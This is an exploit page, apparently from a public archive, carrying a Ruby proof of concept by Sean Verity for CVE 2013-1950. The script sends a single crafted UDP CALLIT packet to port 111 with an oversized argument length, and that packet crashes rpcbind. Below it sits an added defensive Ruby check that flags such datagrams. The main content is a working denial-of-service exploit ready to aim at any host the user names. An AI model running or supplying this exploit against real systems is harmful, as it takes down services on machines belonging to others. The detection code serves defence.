rpcbind (CALLIT Procedure) UDP Crash PoC
Source: veritysr1980 [at] gmail.com  Author: Verity  Published: 2013-07-17
#!/usr/bin/ruby
#
#   rpcbind_udp_crash_poc.rb
#   07/15/2013
#   Sean Verity <veritysr1980 [at] gmail.com>
#   CVE 2013-1950
#
#   rpcbind (CALLIT Procedure) UDP Crash PoC
#   Affected Software Package: rpcbind-0.2.0-19
#
#   Tested on: 
#   Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP) 
#   CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#   rpcbind can be crashed by setting the argument length 
#   value > 8944 in an RPC CALLIT procedure request over UDP.
#
  
require 'socket'
  
def usage
    abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end
  
if ARGV.length == 1
    pkt = [rand(2**32)].pack('N')   # XID
    pkt << [0].pack('N')          # Message Type: CALL (0)
    pkt << [2].pack('N')          # RPC Version: 2
    pkt << [100000].pack('N')     # Program: Portmap (100000)
    pkt << [2].pack('N')          # Program Version: 2
    pkt << [5].pack('N')          # Procedure: CALLIT (5)
    pkt << [0].pack('N')          # Credentials Flavor: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Credentials Verifier: AUTH_NULL (0)
    pkt << [0].pack('N')          # Length: 0
    pkt << [0].pack('N')          # Program: Unknown (0) 
    pkt << [1].pack('N')          # Version: 1
    pkt << [1].pack('N')          # Procedure: 1
    pkt << [8945].pack('N')       # Argument Length
    pkt << "crash"                # Arguments
  
    s = UDPSocket.new
    s.send(pkt, 0, ARGV[0], 111)
else
    usage
end
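
For detection, the condition named in the header comment (a CALLIT argument length above 8944, here also far larger than the bytes actually sent) can be checked on a received UDP datagram before it reaches rpcbind. The following is an added example, not part of the original PoC or of rpcbind; the function names, the result hash and the sample datagrams are assumptions made for illustration.

```ruby
# Added example (defensive check), not part of the original PoC.
PMAP_PROG   = 100000
PMAP_CALLIT = 5
MAX_ARG_LEN = 8944  # threshold taken from the PoC's header comment

# Big-endian 32-bit word at byte offset off, or nil if the buffer is too short.
def u32(buf, off)
  buf.bytesize >= off + 4 ? buf.byteslice(off, 4).unpack1('N') : nil
end

# Skip one opaque_auth (flavor, length, body padded to 4); next offset or nil.
def skip_auth(buf, off)
  len = u32(buf, off + 4)
  return nil if len.nil? || len > 400  # RFC 5531 limits auth bodies to 400 bytes
  off + 8 + ((len + 3) & ~3)
end

# Classify one UDP payload sent to port 111.
def inspect_callit(datagram)
  buf = datagram.b
  _xid, mtype, rpcvers, prog, _vers, procnum = (0..5).map { |i| u32(buf, i * 4) }
  unless mtype == 0 && rpcvers == 2 && prog == PMAP_PROG && procnum == PMAP_CALLIT
    return { verdict: :not_callit }
  end
  off = skip_auth(buf, 24)            # credentials
  off = skip_auth(buf, off) if off    # verifier
  declared = off && u32(buf, off + 12) # after target prog, vers, proc
  return { verdict: :malformed } if declared.nil?
  present = buf.bytesize - (off + 16)
  reasons = []
  reasons << :length_exceeds_payload if declared > present
  reasons << :length_over_threshold  if declared > MAX_ARG_LEN
  { verdict: reasons.empty? ? :ok : :suspicious,
    declared: declared, present: present, reasons: reasons }
end

# Constructed sample datagram (not captured traffic): fixed XID, AUTH_NULL.
def sample(declared_len, args)
  [0x1234, 0, 2, PMAP_PROG, 2, PMAP_CALLIT,
   0, 0, 0, 0, 0, 1, 1, declared_len].pack('N*') + args
end

if __FILE__ == $PROGRAM_NAME
  p inspect_callit(sample(8, "abcdefgh"))  # consistent length
  p inspect_callit(sample(8945, "crash"))  # length field as in the PoC above
end
```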

 